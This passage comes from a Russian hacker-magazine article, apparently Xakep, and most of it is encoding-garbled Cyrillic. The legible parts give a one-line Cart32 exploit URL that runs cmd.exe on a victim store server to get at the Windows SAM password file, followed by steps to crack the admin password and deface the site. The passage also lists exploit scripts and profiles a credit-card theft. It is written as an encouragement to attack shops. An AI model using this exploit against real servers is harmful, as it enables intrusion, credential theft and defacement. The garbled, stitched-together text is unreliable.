сишься, что левые трояны, вирусы и всякая про ... - Xakep Online

ìîæíî çàñòàâèòü âûäàòü ñîäåðæàíèå ëþáîãî
ôàéëà! À åñëè ìîæíî ïîëó÷èòü ñîäåðæèìîå ëþáîãî
ôàéëà, òî ìîæíî ïîñìîòðåòü è
C:\WinNT\repair\sam._, ãäå õðàíÿòñÿ ïàðîëè. Íó
à ñ ýòèìè-òî ïàðîëÿìè ìîæíî ÂѨ.
Êàê ýòî ñäåëàòü?
INSCENE MAN
Ðóññêèé õàêåð, àâòîð ñàìîãî
ãðîìêîãî âçëîìà îíëàéíîâîãî
ìàãàçèíà.
Ýòî òîæå äåëàåòñÿ ÷åðåç áðàóçåð, ïðè÷åì áåç
âñÿêèõ html’îâ, îäíîé ñòðîêîé. Âîò îíà:
http://www.victim.com/scripts/cart32/c32web.ex
 19 ëåò ïîä Ðîæäåñòâî-1999 âçëîìàë áàçó äàííûõ ìóçûêàëüíîãî ìàãàçèíà
CDuniverse.com è ïîõèòèë èíôîðìàöèþ î êðåäèòíûõ êàðòàõ 300 òûñÿ÷ ïîêóïàòåëåé.
Ïîòðåáîâàë 100 òûñÿ÷ äîëëàðîâ “îòñòóïíûõ”. Íà îòêàç îòðåàãèðîâàë îòêðûòèåì ïî àäðåñó www.pcradio.com/maxus.htm
ìàãàçèíà ñ àññîðòèìåíòîì â 25,000 “æèâûõ” êàðò áåñïëàòíî è ïî $1 çà øòóêó. Äåíüãè
ïåðåâîäèëèñü íà ñ÷åò â ðèæñêîì Hansabanka Bank.
 èíòåðâüþ New York Times, NBC è SecurityFocus.com ïðèâåë äîêàçàòåëüñòâà âçëîìà è ðàññêàçàë, ÷òî èñïîëüçîâàë
äûðó â ïðîöåññèíãîâîì ïðèëîæåíèè ICVerify. Ðóêîâîäñòâî Cybercash âñå îïðîâåðãàëî. Discover
Card, American Express è ðÿä àìåðèêàíñêèõ áàíêîâ-ýìèòåíòîâ Visa è MasterCard áûëè âûíóæäåíû ïåðåâûïóñòèòü
äåñÿòêè òûñÿ÷ êàðò.
Ïðè ñîäåéñòâèè AntiOnline.com ÔÁÐ â òå÷åíèå íåäåëè óñòàíîâèëî ëè÷íîñòü õàêåðà è åãî âåðîÿòíîãî íàïàðíèêà
- Åâãåíèÿ Ôåäîðîâà (aka Diagnoz). Îäíàêî, ïî èíôîðìàöèè USA Today, APB News è èñòî÷íèêîâ, áëèçêèõ
ê ÔÁÐ, àðåñòîâ â ýòîé èñòîðèè íå ïîñëåäîâàëî.
Àãåíòñòâî ZDNet íàçâàëî äîñòèæåíèå Ìàêñóñà â òîï-äåñÿòêå ãðîìêèõ âçëîìîâ 2000 ãîäà.
Õîááè - äèäæåéñòâî.
Îò Ñèíòåçà: íåñêîëüêî ëåò íàçàä (êàæåòñÿ, ýòî áûë 97-é ãîä) ÿ òóñîâàëñÿ ñ Äèàãíîçîì è äðóãèìè ðåáÿòàìè
ýòîé òóñû â Ïèòåðå. Îòëè÷íûå ïàðíè, ëþáÿò êëóáèòüñÿ. ß áû ìîã èõ íàçâàòü “ýòàëîíîì” ìîåãî ïîíèìàíèÿ õàêåðà.
Ìîëîäûå, âåñåëûå, ìîäíûå, õàéòåêîâñêèå, ê òîìó æå, î÷åíü íåïëîõî ðàçáèðàþùèåñÿ â êîìïàõ è òåõíîëîãèÿõ.
e?TabName=Cart32%2B&Action=Save+Cart32%
2B+Tab&SaveTab=Cart32%2B&Client=ËÎÃÈÍ&
ClientPassword=ÏÀÐÎËÜ&Admin=&AdminPassw
ord=&TabToSave=Cart32%2B&PlusTabToSave=
Run+External+Program&UseCMDLine=Yes&CM
DLine=cmd.exe+%2Fc+dir+%3E+c%3A%5CC:\
WinNT\repair\sam._
Âñå, îñòàëîñü òîëüêî ïîëîôòèòü ïàðîëü àäìèíà
(ñîôò êà÷àåì ñ http://www.securitysoftwaretech.com),
âîñïîëüçîâàòüñÿ èì è çàìåíèòü
index.html. Äåôýéñ ãîòîâ.
Buy or bye?
Êàê ÿ è ïèñàë â íà÷àëå ñòàòüè, ýòî ïðîèçîøëî
íå 3-4 ãîäà íàçàä, à ñðàâíèòåëüíî íåäàâíî.
Ñàéòîâ, íà êîòîðûõ ñòîèò cart32, â Èíåòå ìîæíî
íàéòè ñêîëüêî óãîäíî, òàê ÷òî âñå âûøåñêàçàííîå
ìîæíî áåç òðóäà ïîâòîðèòü. Íà ýòîì ÿ è çàêîí÷ó,
óäà÷íûõ õàêîâ è ìíîãî äûðÿâûõ ìàãàçÛíîâ
òåáå :).
Íàñ÷¸ò ãîòîâûõ ýêñïëîéòîâ
äëÿ þçàíèÿ cart32, ÿ ãîòîâ
ïðåäëîæèòü òåáå íåñêîëüêî
ïîëåçíûõ ôèøåê.
cart32scan.pl - ñêðèïò äëÿ
ïîèñêà óñòàíîâëåííîé óÿçâèìîé
êàðòî÷êè. Òàêæå ïîääåðæèâàåò
ïðîâåðêó âåðñèè
è ïðîèçâîäèò âûâîä î
âîçìîæíîñòè âçëîìà ñåðâàêà
ñ óñòàíîâëåííûì
ñêðèïòîì.
cart32scan.c - ïîïóëÿðíûé
ýêñïëîéò, áîëåå ñåðü¸çíûé
ïî ñîäåðæàíèþ, ÷åì ïðåäûäóùèé.
Îïÿòü æå, óìååò ñêàíèðîâàòü
ïîòðåáíûé ñàì äûðÿâûé
ñêðèïò. Ñîçäàí ïî ìîòèâàì
âåñòåðíà, ðàçâåðíóâøåãîñÿ
â Áàãòðåêå =)
wemilo.tcl ýêñïëîéò îò øèðîêîèçâåñòíîé
@stake,
ôóíêöèè ñõîæè ïðèñóùèì
ïðåäûäóùèì. Âî, êàê ñêàçàë
=)
Îïèñàííûå ýêñïëîéòû ïîçâîëÿþò
ïîëó÷èòü àäìèíèñòðàòîðñêèå
ïîëíîìî÷èÿ, íà
óïðàâëåíèå êîðçèíîé. È ñàìîå
ãëàâíîå - äîñòóï ê ñîäåðæèìîìó
êîðçèíû, êîòîðàÿ
ïîñëå ïîñåùåíèÿ å¸
õàöêåðîì, ïîëó÷èò ñâî¸ çàêîííîå
èìÿ - ïîìîéêè 8)
l0pht.00-04-27.cart32fix -
ýêñêëþçèâíûé áàãôèêñ âñ¸
îò òîé æå @stake, ïðàâäà,
óæå ïîðÿäêîì óñòàðåâøèé.
Ðåêîìåíäóåòñÿ òîëüêî äëÿ
îáùåãî ðàçâèòèÿ. Èíòåðåñíî
ïðîñëåäèòü ïîÿâëåíèÿ
íåîôèöèàëüíîãî, opensource
ïàò÷à íà ïîïóëÿðíóþ
áàãó...